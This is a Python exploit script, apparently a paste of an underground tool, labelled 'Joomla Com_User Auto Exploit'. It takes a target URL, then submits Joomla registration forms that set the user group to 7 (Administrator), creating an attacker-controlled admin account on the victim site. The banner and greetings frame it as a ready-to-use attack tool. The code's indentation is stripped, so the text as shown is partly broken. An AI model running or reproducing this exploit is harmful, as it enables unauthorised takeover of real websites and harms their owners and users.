barata123

1. #!/usr/bin/python
2. # Joomla Com_User Auto Exploit =D
3. # By xSecurity
4.  
5. import requests as sec4ever, re, urllib, sys, os
6. from threading import Thread
7. from time import sleep
8. def cls():
9. os.system(['clear','cls'][os.name =='nt'])
10.  
11. cls()
12. print '''
13. __ _ _
14. __ __/ _\ ___ ___ _ _ _ __(_) |_ _ _
15. \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
16. > < _\ \ __/ (__| |_| | | | | |_| |_| |
17. /_/\_\\__/\___|\___|\__,_ |_| |_|\__|\__, |
18. |___/Joomla [Com_User] Auto Exploit =D
19. #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
20. #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
21. Special For My Lov3r Cyber-Crystal
22. #Note: U Need Install Requests Package: http://www.youtube.com/ watch?v=Ng5T18HyA-Q'''
23.  
24. pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
25. def one(target,pwd1,pwd2,email):
26. # Wrong Password
27. x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
28. token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
29. post = {}
30. post["jform[name]"] = 'xSecurity'
31. post["jform[username]"] = user
32. post["jform[password1]"] = pwd1
33. post["jform[password2]"] = pwd2
34. post["jform[email1]"] = email
35. post["jform[email2]"] = email
36. post["jform[groups][]"] = "7"
37. post["option"] = "com_users"
38. post["task"] = "registration.register"
39. post[token[0]] = "1"
40. p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
41. x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
42.  
43. def exploit(target,pwd1,pwd2,email):
44. # Wrong Password
45. x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
46. token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
47. post = {}
48. post["jform[name]"] = 'xSecurity'
49. post["jform[username]"] = user
50. post["jform[password1]"] = pwd1
51. post["jform[password2]"] = pwd1
52. post["jform[email1]"] = email
53. post["jform[email2]"] = email
54. post["jform[groups][]"] = "7"
55. post["option"] = "com_users"
56. post["task"] = "registration.register"
57. post[token[0]] = "1"
58. p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
59. x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
60.  
61. xsec = sec4ever.session()
62. if len(sys.argv) == 5:
63. target = sys.argv[1]
64. user = sys.argv[2]
65. pwd1 = sys.argv[3]
66. email = sys.argv[4]
67. one(target,pwd1,pwd2,email)
68. ex = exploit(target,pwd1,pwd2,email)
69. print '[*] Go To Your Email & Active Then Login =D\nUsername: '+user+' & Password: '+pwd1
70. else:
71. print "Usage: python tool.py http://target.com/j0s/ youruser yourpass yourmail"